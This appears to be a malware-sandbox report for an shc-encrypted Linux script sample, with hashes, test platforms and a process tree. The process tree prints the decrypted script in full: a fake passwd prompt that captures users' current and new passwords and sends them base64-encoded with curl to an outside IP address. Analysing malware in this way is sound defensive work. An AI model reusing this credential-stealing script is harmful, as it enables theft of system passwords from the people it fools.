Overview

overview

10

Static

static

10

样本/Lin...9DC1D8

ubuntu-18.04-amd64

7

样本/Lin...B36C5B

ubuntu-24.04-amd64

6

样本/Lin...E3B383

ubuntu-24.04-amd64

8

样本/Lin...6F5973

ubuntu-22.04-amd64

1

样本/Lin...776DB8

ubuntu-18.04-amd64

1

样本/Lin...776DB8

debian-9-armhf

1

样本/Lin...776DB8

debian-9-mips

1

样本/Lin...776DB8

debian-9-mipsel

1

样本/Lin...C9A3F7

ubuntu-18.04-amd64

6

样本/Lin...C9A3F7

debian-9-armhf

6

样本/Lin...C9A3F7

debian-9-mips

6

样本/Lin...C9A3F7

debian-9-mipsel

6

样本/Lin...FECBE5

ubuntu-22.04-amd64

10

1AAF1A9F78...31.tar

windows7-x64

1

1AAF1A9F78...31.tar

windows10-2004-x64

1

xrx/chattr

ubuntu-24.04-amd64

1

xrx/init.sh

ubuntu-22.04-amd64

6

xrx/init0

ubuntu-24.04-amd64

8

xrx/scp

ubuntu-18.04-amd64

1

xrx/scp

debian-9-armhf

1

xrx/scp

debian-9-mips

1

xrx/scp

debian-9-mipsel

1

xrx/secure

ubuntu-24.04-amd64

7

xrx/uninstall.sh

ubuntu-18.04-amd64

6

xrx/uninstall.sh

debian-9-armhf

6

xrx/uninstall.sh

debian-9-mips

6

xrx/uninstall.sh

debian-9-mipsel

6

xrx/xrx

ubuntu-18.04-amd64

6

Analysis

  • max time kernel
    0s
  • max time network
    131s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240729-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    26-11-2024 12:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

  • Size

    990KB

  • MD5

    cdafefedb4709959b4260435dc6f5973

  • SHA1

    9c54fa7b42fb4f25e6dbc995741661cee1bd8141

  • SHA256

    cb7d520296116df898c01bb9e94c05efcaa38dffb14354f42b62262c5b147e34

  • SHA512

    391bf2745abbac6ccd8eee0c7e3ea62daec185ac997d8a8cb0c918c733defdc701ff0ba44d727a3619a9be0e2070e0e34e8ceb2e1cceca889cb0f94b92c2e404

  • SSDEEP

    24576:bNAp09HLyf/Jck/sGjeXFAGqkkdagwGKLUU:bip0Byf/Jck/sGjYBlEwGK

Score
1/10

Malware Config

Signatures

Processes

  • /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
    /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
    1⤵
      PID:1564
    • /bin/bash
      /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c "exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' \"\$@\"" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
      1⤵
        PID:1564
      • /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
        /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
        1⤵
          PID:1564
        • /bin/bash
          /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c " #!/bin/bash if [ \"\$1\" = \"pollo\" ]; then echo 'pollo 👍' exit fi username=\$(whoami) if [ \"\$username\" = \"root\" ]; then if [ \"\$#\" -ne \"0\" ]; then echo 'Changing password for user '\$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=\$(echo \$username \$passvar1 \$passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null if [ \"\$passvar1\" != \"\$passvar2\" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '\$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=\$(echo \$username \$passvar0 \$passvar1 \$passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=\$pass &> /dev/null if [ \"\$passvar1\" != \"\$passvar2\" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi " /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973
          1⤵
            PID:1564
            • /usr/bin/whoami
              whoami
              2⤵
                PID:1565
              • /usr/bin/sleep
                sleep 0.1
                2⤵
                  PID:1566
                • /usr/bin/sleep
                  sleep 0.1
                  2⤵
                    PID:1567
                  • /usr/bin/base64
                    base64
                    2⤵
                      PID:1570
                    • /usr/bin/curl
                      curl -s "http://45.10.20.100:1010/pass?pass=cm9vdAo="
                      2⤵
                        PID:1571
                      • /usr/bin/sleep
                        sleep 0.2
                        2⤵
                          PID:1577

                      Network

                      MITRE ATT&CK Matrix

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads